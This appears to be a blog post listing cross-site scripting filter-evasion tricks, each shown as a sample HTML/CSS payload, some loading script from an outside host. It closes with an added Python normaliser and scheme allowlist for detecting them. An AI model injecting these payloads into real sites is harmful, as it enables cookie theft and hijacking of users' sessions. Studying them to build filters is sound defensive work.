Cross Site Scripting (XSS) attack techniques

Posted on 2012-12-31 09:59:28
1. Change character case

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Replace .js with another extension

    <script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters into the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Evade with a tab or a newline

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab
         -> newline

    (The gaps inside "javascript:" are the tab or newline character the heading refers to; they appear here as spaces.)

7. Evade with "\"

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Evade with hex encoding (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag

    <body onload="alert('onload')">

        Event-handler attributes that can carry it: onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside an SWF

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and let the browser reassemble it.

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. JavaScript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

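The tricks in sections 1, 6, 7, 8, 11 and 14 all beat a filter that pattern-matches the raw text. The example below is added here and is not from the original post: it canonicalises an attribute or CSS value the way a browser will before matching, using the post's own payloads as input, and shows the scheme allowlist that is the actual mitigation. The names `normalize`, `looks_like_script_url` and `url_is_allowed` are the example's own.

```python
import html
import re

# Added example, not from the original post. Every trick in the post defeats a
# filter that matches the raw text: browsers decode entities, ignore tab/LF/CR
# inside a URL scheme and ignore case; legacy IE CSS honours backslash escapes
# and /* */ comments (but not inside quoted strings). Canonicalise first.

# Quoted CSS string (group 1, kept) or a comment (no group, dropped).
_CSS_STR_OR_COMMENT = re.compile(
    r'("(?:[^"\\]|\\.)*"|\'(?:[^\'\\]|\\.)*\')|/\*.*?\*/', re.S)
# CSS escape: backslash + 1-6 hex digits (+ optional blank), or any one char.
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6}\s?|.)", re.S)
_HEX = set("0123456789abcdefABCDEF")


def _css_unescape(m):
    raw = m.group(1)
    digits = raw.strip()
    if digits and all(c in _HEX for c in digits):
        return chr(int(digits, 16))          # \6A -> 'j'
    return raw                               # \s -> 's': expre\ssion -> expression


def normalize(value):
    """Canonicalise an attribute/CSS value for matching. CSS rules are applied
    to every value, which over-approximates; that is fine for detection."""
    v = html.unescape(value)                                    # &#x09; -> TAB
    v = _CSS_STR_OR_COMMENT.sub(lambda m: m.group(1) or "", v)  # expr/*x*/ession
    v = _CSS_ESCAPE.sub(_css_unescape, v)                       # expre\ssi\on
    v = re.sub(r"<!--.*?-->|\]\]><!\[CDATA\[", "", v, flags=re.S)  # javas<!-- -->cript
    v = re.sub(r"[\t\n\r\x00]", "", v)                          # jav<TAB>ascript
    return v.strip().lower()


def looks_like_script_url(value):
    """Detection: does the value resolve to a script URL or a CSS expression()?"""
    v = normalize(value)
    return v.startswith("javascript:") or "expression(" in v


def url_is_allowed(value):
    """Mitigation: allowlist the scheme instead of blocklisting 'javascript:'."""
    v = normalize(value)
    m = re.match(r"([a-z][a-z0-9+.\-]*):", v)
    if m is None:
        return True                          # relative URL, no scheme at all
    return m.group(1) in {"http", "https", "mailto"}
```

A naive `"javascript:" in value` check returns False for the tab/newline, entity and backslash variants above; the normalised check returns True for all of them, and the allowlist rejects them regardless of which evasion was used.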